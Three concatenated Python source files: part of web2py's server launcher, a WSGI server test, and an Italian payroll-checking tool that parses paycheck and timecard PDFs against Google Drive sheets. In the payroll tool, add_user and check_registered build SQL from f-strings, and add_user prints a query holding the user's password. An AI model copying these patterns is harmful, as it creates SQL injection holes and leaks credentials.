name = input("Your GAE app name: ")
content = open(os.path.join('examples', 'app.example.yaml'), 'rb').read()
open('app.yaml', 'wb').write(content.replace("yourappname", name))
else:
print("app.yaml alreday exists in the web2py folder")
if not os.path.exists('gaehandler.py'):
content = open(os.path.join('handlers', 'gaehandler.py'), 'rb').read()
open('gaehandler.py', 'wb').write(content)
else:
print("gaehandler.py alreday exists in the web2py folder")
return
logger = logging.getLogger("web2py")
logger.setLevel(options.log_level)
logging.getLogger().setLevel(options.log_level) # root logger
# on new installation build the scaffolding app
create_welcome_w2p()
if options.run_system_tests:
# run system test and exit
run_system_tests(options)
if options.quiet:
# to prevent writes on stdout set a null stream
class NullFile(object):
def write(self, x):
pass
sys.stdout = NullFile()
# but still has to mute existing loggers, to do that iterate
# over all existing loggers (root logger included) and remove
# all attached logging.StreamHandler instances currently
# streaming on sys.stdout or sys.stderr
loggers = [logging.getLogger()]
loggers.extend(logging.Logger.manager.loggerDict.values())
for l in loggers:
if isinstance(l, logging.PlaceHolder): continue
for h in l.handlers[:]:
if isinstance(h, logging.StreamHandler) and \
h.stream in (sys.stdout, sys.stderr):
l.removeHandler(h)
# NOTE: stderr.write() is still working
if not options.no_banner:
# banner
print(ProgramName)
print(ProgramAuthor)
print(ProgramVersion)
from pydal.drivers import DRIVERS
print('Database drivers available: %s' % ', '.join(DRIVERS))
if options.run_doctests:
# run doctests and exit
test(options.run_doctests, verbose=options.verbose)
return
if options.shell:
# run interactive shell and exit
sys.argv = [options.run or ''] + options.args
run(options.shell, plain=options.plain, bpython=options.bpython,
import_models=options.import_models, startfile=options.run,
cron_job=options.cron_job, force_migrate=options.force_migrate,
fake_migrate=options.fake_migrate)
return
# set size of cron thread pools
newcron.dancer_size(options.min_threads)
newcron.launcher_size(options.cron_threads)
if options.cron_run:
# run cron (extcron) and exit
logger.debug('Running extcron...')
global_settings.web2py_crontype = 'external'
newcron.extcron(options.folder, apps=options.crontabs)
return
if not options.with_scheduler and options.schedulers:
# run schedulers and exit
try:
start_schedulers(options)
except KeyboardInterrupt:
pass
return
if options.with_cron:
if options.soft_cron:
print('Using cron software emulation (but this is not very efficient)')
global_settings.web2py_crontype = 'soft'
else:
# start hardcron thread
logger.debug('Starting hardcron...')
global_settings.web2py_crontype = 'hard'
newcron.hardcron(options.folder, apps=options.crontabs).start()
# if no password provided and have Tk library start GUI (when not
# explicitly disabled), we also need a GUI to put in taskbar (system tray)
# when requested
root = None
if (not options.no_gui and options.password == '<ask>') or options.taskbar:
try:
if PY2:
import Tkinter as tkinter
else:
import tkinter
root = tkinter.Tk()
except (ImportError, OSError):
logger.warn(
'GUI not available because Tk library is not installed')
options.no_gui = True
except:
logger.exception('cannot get Tk root window, GUI disabled')
options.no_gui = True
if root:
# run GUI and exit
root.focus_force()
# Mac OS X - make the GUI window rise to the top
if os.path.exists("/usr/bin/osascript"):
applescript = """
tell application "System Events"
set proc to first process whose unix id is %d
set frontmost of proc to true
end tell
""" % (os.getpid())
os.system("/usr/bin/osascript -e '%s'" % applescript)
# web2pyDialog takes care of schedulers
master = web2pyDialog(root, options)
signal.signal(signal.SIGTERM, lambda a, b: master.quit())
try:
root.mainloop()
except:
master.quit()
sys.exit()
spt = None
if options.with_scheduler and options.schedulers:
# start schedulers in a separate thread
spt = threading.Thread(target=start_schedulers, args=(options,))
spt.start()
# start server
if options.password == '<ask>':
options.password = getpass.getpass('choose a password:')
if not options.password and not options.no_banner:
print('no password, no web admin interface')
# Use first interface IP and port if interfaces specified, since the
# interfaces option overrides the IP (and related) options.
if not options.interfaces:
ip = options.ip
port = options.port
else:
first_if = options.interfaces[0]
ip = first_if[0]
port = first_if[1]
if options.server_key and options.server_cert:
proto = 'https'
else:
proto = 'http'
url = get_url(ip, proto=proto, port=port)
if not options.no_banner:
message = '\nplease visit:\n\t%s\n'
if sys.platform.startswith('win'):
message += 'use "taskkill /f /pid %i" to shutdown the web2py server\n\n'
else:
message += 'use "kill -SIGTERM %i" to shutdown the web2py server\n\n'
print(message % (url, os.getpid()))
# enhance linecache.getline (used by debugger) to look at the source file
# if the line was not found (under py2exe & when file was modified)
import linecache
py2exe_getline = linecache.getline
def getline(filename, lineno, *args, **kwargs):
line = py2exe_getline(filename, lineno, *args, **kwargs)
if not line:
try:
with open(filename, "rb") as f:
for i, line in enumerate(f):
line = line.decode('utf-8')
if lineno == i + 1:
break
else:
line = ''
except (IOError, OSError):
line = ''
return line
linecache.getline = getline
server = main.HttpServer(ip=ip,
port=port,
password=options.password,
pid_filename=options.pid_filename,
log_filename=options.log_filename,
profiler_dir=options.profiler_dir,
ssl_certificate=options.server_cert,
ssl_private_key=options.server_key,
ssl_ca_certificate=options.ca_cert,
min_threads=options.min_threads,
max_threads=options.max_threads,
server_name=options.server_name,
request_queue_size=options.request_queue_size,
timeout=options.timeout,
socket_timeout=options.socket_timeout,
shutdown_timeout=options.shutdown_timeout,
path=options.folder,
interfaces=options.interfaces)
try:
server.start()
except KeyboardInterrupt:
server.stop()
if spt is not None:
try:
spt.join()
except:
logger.exception('error terminating schedulers')
logging.shutdown()
|
test_wsgi.py
|
import py
import socket, time
from oejskit import wsgi
#from wsgiref.validate import validator
def test_timeout():
def app(environ, start_response):
start_response('200 OK', [('content-type', 'text/plain')])
return ['stuff\n']
serverSide = wsgi.WSGIServerSide(0)
port = serverSide.get_port()
import threading, urllib2
def get(rel):
try:
return urllib2.urlopen('http://localhost:%d/%s' %
(port, rel)).read()
except urllib2.HTTPError, e:
return e.code, e.fp.read()
results = []
def requests():
results.append(get('whatever'))
threading.Thread(target=requests).start()
serverSide.set_app(app)
t0 = time.time()
py.test.raises(socket.timeout, serverSide.serve_till_fulfilled, None, 3)
t1 = time.time()
assert results == ['stuff\n']
assert 3.0 <= (t1 - t0) <= 6.0
def test_integration():
calls = []
def app(environ, start_response):
path_info = environ['PATH_INFO']
if 'stop' in path_info:
start_response('200 OK', [('content-type', 'text/plain')])
environ['oejskit.stop_serving']()
return ['ok\n']
if not path_info.startswith('/x'):
start_response('404 Not Found', [('content-type',
'text/plain')])
return ["WHAT?\n"]
calls.append((environ['REQUEST_METHOD'], path_info))
start_response('200 OK', [('content-type', 'text/plain')])
return ['hello\n']
def other(environ, start_response):
path_info = environ['PATH_INFO']
if path_info == '/other':
start_response('200 OK', [('content-type', 'text/plain')])
return ['OTHER\n']
start_response('404 Not Found', [('content-type',
'text/plain')])
return ["???\n"]
serverSide = wsgi.WSGIServerSide(0)
port = serverSide.get_port()
import threading, urllib2
def get(rel):
try:
return urllib2.urlopen('http://localhost:%d/%s' %
(port, rel)).read()
except urllib2.HTTPError, e:
return e.code, e.fp.read()
done = threading.Event()
results = []
def requests():
results.append(get('x'))
results.append(get('other'))
get('stop')
done.set()
threading.Thread(target=requests).start()
serverSide.set_app(app)
serverSide.serve_till_fulfilled(other, 60)
done.wait()
assert results[0] == 'hello\n'
assert results[1] == 'OTHER\n'
|
appLib.py
|
import os
import copy
import io
import re
import pickle
import fitz # PyMuPDF
import json
import mysql
import smtplib
import openpyxl
import xlrd
import datetime
import holidays
import random
import pandas as pd
import numpy as np
from openpyxl.utils.cell import get_column_letter
from openpyxl.styles import PatternFill, Alignment, Border, Side
from openpyxl.worksheet.datavalidation import DataValidation
from openpyxl import formatting
from threading import Thread
from operator import itemgetter
from googleapiclient.http import MediaIoBaseDownload
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request, AuthorizedSession
from email.message import EmailMessage
from email.mime.text import MIMEText
# PATHS
db_config_path = "../config_files/db/config.json"
email_config_path = "../config_files/email_service/config.json"
google_config_path = "../config_files/google/google_userconfig.json"
logo_path = "../config_files/imgs/BusinessCat.png"
icon_path = "../config_files/imgs/Cat.ico"
# COLORS
default_background = "#ffffff"
color_light_orange = "#fff6e5"
color_green = "#009922"
color_yellow = "#ffe01a"
color_red = "#ff3333"
color_orange = "#e59345"
color_grey = "#e3e3e3"
# GOOGLE VARIABLES
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = '../config_files/google/google_credentials.json'
creds = None
SCOPE = [
'https://www.googleapis.com/auth/drive'
]
''' UTILITIES '''
def START_in_Thread(process):
"""prevent process to freeze the app upon launch"""
Thread(target=process).start()
def check_paycheck_badges():
done_paycheck = False
done_badges = False
if os.path.exists("BUSTE PAGA"):
if len(os.listdir("BUSTE PAGA")) > 0:
done_paycheck = True
if os.path.exists("CARTELLINI"):
if len(os.listdir("CARTELLINI")) > 0:
done_badges = True
check = (done_paycheck, done_badges)
return check
def get_sheetnames_from_bytes(bytes_):
""" open bytestream as openpyxl workbooks and return an array of worksheet names """
wb = openpyxl.load_workbook(bytes_)
sheetnames = wb.sheetnames
return sheetnames
''' GOOGLE API METHODS '''
def authenticate(func):
def auth_wrapper(*args, **kwargs):
global creds
global SCOPE
# load token.pickle if present
if os.path.exists('../config_files/google/token.pickle'):
with open('../config_files/google/token.pickle', 'rb') as token:
creds = pickle.load(token)
if not creds or not creds.valid:
# ? if token needs to be refreshed it will be refreshed
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
# ? otherwise authenticate
else:
flow = InstalledAppFlow.from_client_secrets_file(os.environ['GOOGLE_APPLICATION_CREDENTIALS'], SCOPE)
creds = flow.run_local_server(port=0)
with open('../config_files/google/token.pickle', 'wb') as token:
pickle.dump(creds, token)
# raise if user does not authenticate
if not creds:
raise Exception("You are not allowed to run this method >> Unauthorized")
return func(*args, **kwargs)
return auth_wrapper
@authenticate
def create_auth_session(credentials=creds):
return AuthorizedSession(credentials)
@authenticate
def build_service(service, version="v3"):
return build(service, version, credentials=creds)
def get_df_bytestream(ID):
"""
get google sheet for comparison. return it as a bytestream
"""
service = build_service("drive")
conversion_table = service.about().get(fields="exportFormats").execute()
request = service.files().export_media(fileId=ID,
mimeType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet")
fh = io.BytesIO()
# download file bytestream
downloader = MediaIoBaseDownload(fh, request)
done = False
while not done:
status, done = downloader.next_chunk()
return fh
def get_comparison_df(bytestream, month):
"""
parse bytestream as a pandas dataframe
"""
# parse bytestream into df
df = pd.read_excel(bytestream, sheet_name=month.upper(), index_col=0)
return df
def get_sheetlist():
"""
get google sheet list in google drive
"""
service = build_service("drive")
results = service.files().list(pageSize=10, fields="nextPageToken, files(id, name, mimeType)", q="mimeType='application/vnd.google-apps.spreadsheet'").execute()
items = results.get('files', [])
items = sorted(items, key=itemgetter('name'))
return items
''' MAILS '''
def load_email_server_config():
try:
with open(email_config_path, 'r') as f:
config = json.load(f)
return config
except:
raise Exception("Cannot find email server config file")
def connect_to_mail_server():
config = load_email_server_config()
smtp = smtplib.SMTP_SSL(config['server'], config['port'], timeout=10)
smtp.ehlo()
try:
smtp.login(config['email'], config['password'])
print(f"""CONNECTED SUCCESSFULLY:\n
-> SERVER {config['server']}\n
-> PORT {config['port']}\n
-> USER {config['email']}\n
-> PWD {"*"*len(str(config['password']))}
""")
except:
raise Exception("Login al server non riuscito")
return smtp
''' DB UTILS '''
def load_db_config():
try:
with open(db_config_path, "r") as f:
config = json.load(f)
except:
raise Exception("Cannot find db config file")
return config
def connect_to_db(config):
db = mysql.connector.connect(
host=config['host'],
password=config['password'],
username=config['username'],
database=config['database'],
port=config['port']
)
return db
def add_user(db, cursor, email, pwd, product_key, workstations):
workstations = json.dumps(workstations)
task = f"INSERT INTO users (email, pwd, product_key, workstations) VALUES ('{email}','{pwd}','{product_key}','{workstations}')"
print(task)
cursor.execute(task)
print(f"-> user added")
db.commit()
return cursor
def check_registered(cursor, email):
already_registered = False
task = f"SELECT * FROM users WHERE email = '{email}'"
cursor.execute(task)
if cursor.fetchone():
already_registered = True
return already_registered
''' CLASSES '''
class PaycheckController():
def __init__(self):
"""
paychecks_to_check (str) -> path to multiple pages pdf containing all paychecks to check
badges_to_check (str) -> path to folder containing all badges files as .pdf
"""
"""
try:
self.__validate_data(paychecks_to_check, badges_to_check)
except Exception() as e:
raise Exception(e)
"""
self.badges_path = "" # path to CARTELLINI folder
self.paychecks_to_check = "" # lul_controllo
self.conversion_table_path = "../config_files/conversion_table.json"
self.verify_filename = "Verifica.xlsx" #name of the output verification xlsx
self.highlight_error = "FFFFFFFF"
self.default_configuration = {
"col_codes": {},
"col_to_extract": [
"Z01100",
"Z01160",
"Z00246",
"Z00255",
"Z01138",
"000279",
"001008",
"ZP0160",
"ZP0162",
"ZPS000",
"000282",
"003955",
"Z05031",
"Z05075",
"ZP0001",
"ZP0003",
"ZP0030",
"003951",
"002099",
"002101",
"003802",
"002100",
"F09080",
"F09100",
"F09130",
"F09081",
"Z50022",
"Z50023",
"Z51000",
"Z51010",
"Z05004",
"Z05041",
"Z05065",
"Z05060",
"ZP0029",
"000085",
"000229",
"000086",
"ZP8134",
"ZP8138",
"ZP8130",
"003450",
"003411",
"000283",
"000031",
"ZP0140",
"ZP0144",
"F02701",
"quota t.f.r.",
"quota t.f.r. a fondi"
],
"merging_columns": {
"Ferie/fest. pagate": [
"Z01100",
"Z01160",
"Z01138",
"Z00255",
"Z51010",
"Z00246",
"Z51000",
"000031"
],
"T.F.R.": [
"quota t.f.r.",
"quota t.f.r. a fondi",
"ZP8134",
"003450",
"fondo t.f.r. al 31/12"
],
"Cessione 1/5": [
"002101",
"002100",
"003951",
"002099"
],
"Assegni Familiari": [
"ZP0160",
"ZP0162",
"ZP0140",
"ZP0144",
]
}
}
self.config = None
self.__load_conversion_table()
""" PRIVATE METHODS """
def __load_conversion_table(self):
"""
set PaycheckController configuration. with this configuration the program knows wich field
extract from paychecks
"""
if os.path.exists(self.conversion_table_path):
with open(self.conversion_table_path, "r") as f:
new_config = json.load(f)
self.config = new_config
return
else:
self.config = copy.deepcopy(self.default_configuration)
""" PUBLIC METHODS """
def create_config_from_csv(self, csv_path):
"""
csv must have at least two columns 'Codice voce' and 'Descrizione voce'
"""
new_config = copy.deepcopy(self.config)
with open(csv_path, 'rt')as f:
df = pd.read_csv(f, sep=";")
columns = {}
for index, row_ in df.iterrows():
row = dict(row_)
# parse out nan values
parsed_row = {}
for val in row:
if not pd.isnull(row[val]):
parsed_row[val] = row[val]
if parsed_row['Codice voce'] not in new_config["col_codes"]:
columns[parsed_row['Codice voce']] = parsed_row
columns[parsed_row['Codice voce']]['col_value'] = -1
# adding keys
columns["quota t.f.r."] = {"Descrizione voce": "Quota T.F.R.", "col_value": -1}
columns["quota t.f.r. a fondi"] = {"Descrizione voce": "Quota T.F.R. a Fondi", "col_value": -1}
# setting new_config with parsed data and dumping it
new_config["col_codes"] = columns
with open(self.conversion_table_path, "w") as f:
f.write(json.dumps(new_config, indent=4, ensure_ascii=True))
self.__load_conversion_table()
print(f"* * conversion_table.json created from this file >> {csv_path}")
def validate_data(self):
if not self.paychecks_to_check:
raise Exception("Error: paycheck to check not specified")
if not os.path.exists(self.paychecks_to_check):
raise Exception(f"Error: cannot find {self.paychecks_to_check}")
if not os.path.exists(self.badges_path):
raise Exception(f"Error: cannot find {self.badges_path}")
if not os.path.isdir(self.badges_path):
raise Exception(f"Error: {self.badges_path} is not a folder")
if len(os.listdir(self.badges_path)) < 1:
raise Exception(f"Error: {self.badges_path} is empty!")
return True
def set_badges_path(self, path):
"""setter for path to badges folder. it should contain .pdf files from every badge (splitted from BusinessCat)"""
self.badges_path = path
def set_paychecks_to_check_path(self, path):
"""setter for path to paychecks to check. it should be a .pdf file"""
self.paychecks_to_check = path
# main functions
def paycheck_verification(self, create_Excel=True):
PDF_file = self.paychecks_to_check
total_content = {}
col_codes = self.config['col_codes']
col_to_extract = self.config['col_to_extract']
merging_columns = self.config['merging_columns']
# if there are no columns to extract set in the configuration, raise exception
if not col_codes:
raise Exception("No columns specified for extraction in config file")
inputpdf = fitz.open(PDF_file)
# per ogni pagina
for i in range(inputpdf.pageCount):
page = inputpdf.loadPage(i)
blocks = page.getText("blocks")
blocks.sort(key=lambda block: block[1]) # sort vertically ascending
####### find name in page
name = None
for index, b in enumerate(blocks):
for elem in b:
elem = str(elem)
if ('cognome' in elem and 'nome' in elem) or ('COGNOME' in elem and 'NOME' in elem):
name_array = (blocks[index+1][4]).split('\n')
# conditional fix array
if len(name_array) == 2:
for check_ in name_array:
if "cessat" in check_.lower():
name_array = (blocks[index+2][4]).split('\n')
break
#check if there's a name in the array wich was found in the block
for value in name_array:
valid = True
for char in value:
if char.isdigit():
valid = False
break
if valid and value:
if value != None and not value.isspace() and value[0].isalpha():
name = value
break
if name:
name = name.upper()
# add name to total_content
if name not in total_content:
total_content[name] = {}
####### get page content
for index, b in enumerate(blocks):
content = b[4].split('\n')
content = [string for string in content if (string != "" and not string.startswith(" "))]
# find ordinary and overtime hours in paycheck
h_check = [h.lower().strip() for h in content]
if "ore ordinarie" and "ore straordinarie" in h_check:
w_hours = [x for x in blocks[index+2][4].split('\n') if "," in x]
if len(w_hours) == 1:
w_hours.append("0")
try:
total_content[name]['Ore ordinarie'] = float(w_hours[0].replace(",","."))
total_content[name]['Ore straordinarie'] = float(w_hours[1].replace(",","."))
except IndexError:
pass
# parsing content
for i, elem in enumerate(content):
# parse netto del mese
if "NETTOsDELsMESE" in elem:
netto = blocks[index+1][-3]
# alcune buste possono essere leggermente diverse, questo controllo ovvia alla cosa
if str(netto).startswith("Perm"):
netto = blocks[index+2][-3]
netto = netto.replace("€", "").strip().replace(",",".")
netto = netto.replace(".", "", (netto.count('.') - 1))
try:
netto = float(netto)
total_content[name]["Netto del Mese"] = netto
except:
pass
elem = (elem.replace("*", "")).strip()
for paycheck_code in col_codes:
if (paycheck_code.lower() == elem.split(" ")[0].lower()) \
or (len(paycheck_code.split(" ")) > 1) and elem.lower().startswith(paycheck_code.lower()):
# check if value is to be extracted
if paycheck_code in col_to_extract:
# check if it needs to be merged
elem_colname = None
for colname in merging_columns:
for subname in merging_columns[colname]:
if subname == paycheck_code:
elem_colname = colname
if not elem_colname:
elem_colname = col_codes[paycheck_code]['Descrizione voce']
# get row value
val = content[col_codes[paycheck_code]['col_value']].replace(",", ".")
val = val.replace(".", "", (val.count('.') - 1))
try:
val = float(val)
except:
pass
# report data in the proper column
if elem_colname not in total_content[name]:
total_content[name][elem_colname] = val
else:
total_content[name][elem_colname] += val
if create_Excel:
sheet_name = "Verifica Buste Paga"
self.create_Excel(total_content, sheet_name)
print(f"File {self.verify_filename} generato con successo, {sheet_name} aggiunto al suo interno")
def badges_verification(self, create_Excel=True):
def parse_decimal_time(decimal_time):
#if 0 not present attach it
if len(decimal_time) == 1:
decimal_time = decimal_time + "0"
hour_min = 60
result = (100*int(decimal_time))/hour_min
return str(int(result))
total_content = {}
#for each badge
for file in os.listdir(self.badges_path):
path_to_badge = "/".join((self.badges_path, file))
full_name = None
last_block = []
inputpdf = fitz.open(path_to_badge)
####### find name
page = inputpdf.loadPage(0)
blocks = page.getText("blocks")
blocks.sort(key=lambda block: block[1]) # sort vertically ascending
for index, b in enumerate(blocks):
if "cognome e nome" in b[4].split('\n')[0].lower():
full_name = blocks[index+1][-3].split('\n')[0]
full_name = " ".join(full_name.split())
break
###### find values
if full_name:
total_content[full_name] = {"Ore ordinarie": 0.0, "Ore straordinarie": 0.0}
for index, b in enumerate(blocks):
##### check if block is a day
if len(b[4].split()[0][:-1]) <= 2 and b[4].split()[0][-1].isalpha() and b[4].split()[0][:-1].isdigit():
day = b[4].split()
day, day_values_ = day[0], day[1:]
# itera sui valori del giorno e controlla se sono stati letti correttamente dalla libreria POSSIBILE BUG IN CASO DI CODICI LUNGHI PIU DI 3 CARATTERI
day_values = []
for i, v_ in enumerate(day_values_):
if len(v_) > 6: # maggiore di orari formattati così ###,##
day_values.append(v_[0:2])
day_values.append(v_[2:])
i += 1
else:
day_values.append(v_)
i += 1
day_values_ = day_values
# check if data is valid
if len(day_values_) != 0 and day[1:][0].isdigit():
if len(day_values_) % 2 != 0:
raise Exception(f"Expected even pairs, got uneven pairs for worker {full_name} on day {day}")
day_values_ = list(zip(day_values_[0::2], day_values_[1::2]))
day_values = []
# parse tuples in day values_
for i_, tupla in enumerate(day_values_):
# remove errors and start/end of workshift
if len((tupla[0])) > 4 or (len(tupla[0]) == 4 and "," not in tupla[0]):
continue
if len(day_values) < 2:
day_values.append(tupla)
# if not hours as first value skip day
if day_values:
if len(day_values[0][0]) == 3:
pass
else:
# parse decimal time values to number values
value_to_add = day_values[0][0].replace(",", ".").split(".")
if len(value_to_add) == 2:
if value_to_add[1] != "00" and value_to_add[1] != "0":
value_to_add[1] = parse_decimal_time(value_to_add[1])
value_to_add = float(".".join(value_to_add))
else:
value_to_add = float(day_values[0][0])
# if there's more than a pair of values in the day
if len(day_values) > 1:
# if hours are overtime skip them
if day_values[1][0] == "306" or day_values[1][0] == "006":
pass
else:
total_content[full_name]['Ore ordinarie'] += value_to_add
# otherwise assume they are ordinary hours
else:
total_content[full_name]['Ore ordinarie'] += value_to_add
##### check if block is last and parse its data
if b[4].split()[0].isdigit() and not b[4].split()[0][-1].isalpha() and len(b[4].split()[0])<=3:
last_block_values = b[4].split()
# parse values
for val in last_block_values:
is_number = True
for letter in val:
if letter.isalpha() and letter != ",":
is_number = False
# append conditionally
if is_number:
if "," in val:
last_block.append(float(val.replace(",",".")))
else:
last_block.append(int(val))
else:
if type(last_block[-1]) == int or type(last_block[-1]) == float:
last_block.append(val)
else:
last_block[-1] = last_block[-1] + " " + val
# check if data is valid
if len(last_block)%3 != 0:
raise Exception(f"Expected triplets on badge footer values for worker {full_name}")
##### last fixes
total_content[full_name]["Ore ordinarie"] = total_content[full_name]["Ore ordinarie"]
last_block = list(zip(last_block[0::3], last_block[1::3], last_block[2::3]))
for pair in last_block:
#parse pair[2] time value to number value
pair_value = str(pair[2]).replace(",", ".").split(".")
if len(pair_value) == 2:
if pair_value[1] != "00" and pair_value[1] != "0":
pair_value[1] = parse_decimal_time(pair_value[1])
pair_value = float(".".join(pair_value))
if pair[0] == 306 or pair[0] == 6:
total_content[full_name]["Ore straordinarie"] += pair_value
total_content[full_name][str(pair[0]) + " " + str(pair[1])] = pair_value
if create_Excel:
sheet_name = "Verifica Cartellini"
self.create_Excel(total_content, sheet_name)
print(f"File {self.verify_filename} generato con successo, {sheet_name} aggiunto al suo interno")
def create_Excel(self, content, sheet_name, transposed=True):
df = pd.DataFrame.from_dict(content)
if transposed:
df = df.T
# sort alphabetically rows and columns
df = df.sort_index()
df = df.reindex(sorted(df.columns), axis=1)
open_mode = "a" if os.path.exists(self.verify_filename) else "w"
with pd.ExcelWriter(self.verify_filename, mode=open_mode) as writer:
df.to_excel(writer, sheet_name=sheet_name)
def compare_badges_to_paychecks(self, keep_refer_values=True):
CHECK_SUFFIX = " PAYCHECK"
badges_df = pd.read_excel(self.verify_filename, sheet_name="Verifica Cartellini", index_col=0)
paychecks_df = pd.read_excel(self.verify_filename, sheet_name="Verifica Buste Paga", index_col=0)
# set indexes name
badges_df.index.name = "LAVORATORI"
paychecks_df.index.name = "LAVORATORI"
# fix wrong indexes in badges
badges_df = badges_df.rename(index={
'GUZMAN URENA ALEXANDER DE JE': 'GUZMAN URENA ALEXANDER DE JESUS',
'NUTU LOREDANA ADRIAN': 'NUTU LOREDANA ADRIANA'
})
# uniform indexes
badges_df.index = badges_df.index.str.upper()
paychecks_df.index = paychecks_df.index.str.upper()
# create df with all data
common_columns = set(badges_df.columns.values).intersection(set(paychecks_df.columns.values))
common_df = paychecks_df[list(common_columns)].copy()
renaming = {key: key + CHECK_SUFFIX for key in common_df.columns.values}
common_df = common_df.rename(columns=renaming)
data_df = badges_df.merge(common_df, left_index=True, right_index=True)
self.create_Excel(data_df, sheet_name="temp", transposed=False)
destination_workbook = openpyxl.load_workbook(self.verify_filename)
ws = destination_workbook["temp"]
# find column of columns to highlight
headings = [row for row in ws.iter_rows()][0]
headings = [x.value for x in headings]
matching_ = dict.fromkeys(common_columns, 0)
matching = {}
for col in matching_:
matching[col] = 0
matching[col + CHECK_SUFFIX] = 0
for col in headings:
if col in matching.keys():
matching[col] = headings.index(col)
for index, row in enumerate(ws.iter_rows()):
# headers exclueded
if index != 0:
row_values = [x.value for x in row]
worker_check = {}
worker_errors = []
# gather worker data
for val in matching:
worker_check[val] = row_values[matching[val]]
# find worker errors
for data in worker_check:
check_val = data + CHECK_SUFFIX
if CHECK_SUFFIX not in data and check_val in worker_check:
if worker_check[data] == 0 and worker_check[check_val] == None:
continue
else:
if (worker_check[data]>0 and worker_check[check_val] == None) or (worker_check[data] - worker_check[check_val] != 0):
worker_errors.append(data)
worker_errors.append(check_val)
if worker_errors:
# parse errors to cells
highlight_row = index + 1
for _i, error in enumerate(worker_errors):
highlight_column = get_column_letter(matching[error]+1)
worker_errors[_i] = str(highlight_column) + str(highlight_row)
for c in worker_errors:
cell = ws[c]
cell.fill = PatternFill(start_color='FFEE1111', end_color='FFEE1111', fill_type='solid')
# drop refer columns conditionally
if not keep_refer_values:
col_to_remove = []
for val in matching:
if CHECK_SUFFIX in val:
col_to_remove.append(matching[val]+1)
for val in sorted(col_to_remove, reverse=True):
ws.delete_cols(val)
#replace old verification with edited one
destination_workbook.remove(destination_workbook["Verifica Cartellini"])
ws.title = "Verifica Cartellini"
destination_workbook.save(self.verify_filename)
print(f">> BADGES COMPARED WITH PAYCHECKS SUCCESSFULLY")
"""
# funziona male. evidenzia giusto ma non tutto
styled_df = data_df.style
for column in common_columns:
col_to_check = column + " PAYCHECK"
styled_df = styled_df.apply(lambda i_: ["background-color:red" if data_df.iloc[i_][col_to_check] - data_df.iloc[i_][column] != 0 else "" for i_, row in enumerate(data_df.iterrows())], subset=[column], axis=0)
styled_df.to_excel("test.xlsx", engine="openpyxl", index=True)
"""
def compare_paychecks_to_drive(self, df_bytestream, sheet, keep_refer_values=True, leave_blanks=False):
CHECK_SUFFIX = " DRIVE"
drive_df = get_comparison_df(df_bytestream, sheet)
drive_df = drive_df[drive_df.index.notnull()]
paychecks_df = pd.read_excel(self.verify_filename, sheet_name="Verifica Buste Paga", index_col=0)
# set indexes name
paychecks_df.index.name = "LAVORATORI"
drive_df.index.name = "LAVORATORI"
# uniform indexes
drive_df.index = drive_df.index.str.upper()
paychecks_df.index = paychecks_df.index.str.upper()
# check divergences on dataframes
problems = {"uncommon_indexes": [],"different_lenght": False, "error_string": ""}
uncommon_indexes = list(set(drive_df.index.values) - set(paychecks_df.index.values))
same_index_length = True if len(drive_df.index) - len(paychecks_df.index) == 0 else False
# if there are not hired people in drive_df
if (uncommon_indexes and not same_index_length):
problems["uncommon_indexes"] = uncommon_indexes
problems["error"] = "Non assunti sul Drive"
# if there are typos in drive_df
elif (uncommon_indexes and same_index_length):
problems["uncommon_indexes"] = uncommon_indexes
problems["error"] = "Errori di scrittura sul Drive"
# merge dataframes
common_columns = list(set(drive_df.columns.values).intersection(set(paychecks_df.columns.values)))
common_df = drive_df[common_columns]
common_df = common_df.rename(columns={key: key + CHECK_SUFFIX for key in common_df.columns.values})
#data_df = pd.merge_ordered(left=common_df.reset_index(), right=paychecks_df.reset_index(), left_on="LAVORATORI", right_on="LAVORATORI", left_by="LAVORATORI").set_index("LAVORATORI").sort_index()
data_df = paychecks_df.merge(common_df, left_index=True, right_index=True).sort_index()
self.create_Excel(data_df, sheet_name="temp", transposed=False)
destination_workbook = openpyxl.load_workbook(self.verify_filename)
ws = destination_workbook["temp"]
# create empty rows for uncommon_indexes (shouldnt be used)
if leave_blanks:
index_checkup = {k: v for k, v in enumerate(common_df.index.values)}
# add blank lines based on index_checkup
rows = list(enumerate(ws.iter_rows()))
added_rows = 0
for row in rows[::-1]:
i_ = row[0]+1
w_name = row[1][0].value
try:
if index_checkup[i_-added_rows] != w_name:
ws.insert_rows(i_+added_rows)
added_rows += 1
except:
pass
# find column of columns to highlight
headings = [row for row in ws.iter_rows()][0]
headings = [x.value for x in headings]
matching_ = dict.fromkeys(common_columns, 0)
matching = {}
for col in matching_:
matching[col] = 0
matching[col + CHECK_SUFFIX] = 0
for col in headings:
if col in matching.keys():
matching[col] = headings.index(col)
for index, row in enumerate(ws.iter_rows()):
# headers exclueded
if index != 0:
row_values = [x.value for x in row]
worker_check = {}
worker_errors = []
# gather worker data from his row
for key in matching:
val = row_values[matching[key]]
if isinstance(val, str) and "€" in val:
val = val.replace("€", "").replace("-", "").replace(",", ".").strip()
worker_check[key] = float(val) if val else 0
elif not val:
worker_check[key] = 0
elif isinstance(val, float) or isinstance(val, int):
worker_check[key] = val
# find worker errors
for data in worker_check:
if CHECK_SUFFIX not in data:
try:
if worker_check[data] - worker_check[data + CHECK_SUFFIX] != 0:
worker_errors.append(data)
worker_errors.append(data + CHECK_SUFFIX)
except Exception as e:
print(e)
if worker_errors:
# parse errors to cells
highlight_row = index + 1
for _i, error in enumerate(worker_errors):
highlight_column = get_column_letter(matching[error] + 1)
worker_errors[_i] = str(highlight_column) + str(highlight_row)
for c in worker_errors:
cell = ws[c]
cell.fill = PatternFill(start_color='FFEE1111', end_color='FFEE1111', fill_type='solid')
# drop refer columns conditionally
if not keep_refer_values:
col_to_remove = []
for val in matching:
if CHECK_SUFFIX in val:
col_to_remove.append(matching[val] + 1)
for val in sorted(col_to_remove, reverse=True):
ws.delete_cols(val)
# replace old verification with edited one
destination_workbook.remove(destination_workbook["Verifica Buste Paga"])
ws.title = "Verifica Buste Paga"
destination_workbook.save(self.verify_filename)
print(f">> PAYCHECKS COMPARED WITH DRIVE {sheet} VALUES SUCCESSFULLY")
return problems
class BillingManager():
""" classe non utilzzata """
def __init__(self, bill_name="Fattura"):
self.bill_name = f"{bill_name}.xlsx"
self.badges_path = None # badges_path
self.regex_day_pattern = "([1-9]|[12]\d|3[01])[LMGVSF]"
self.name_cell = "B5" # in che cella del badge_path si trova il nome nei cartellini
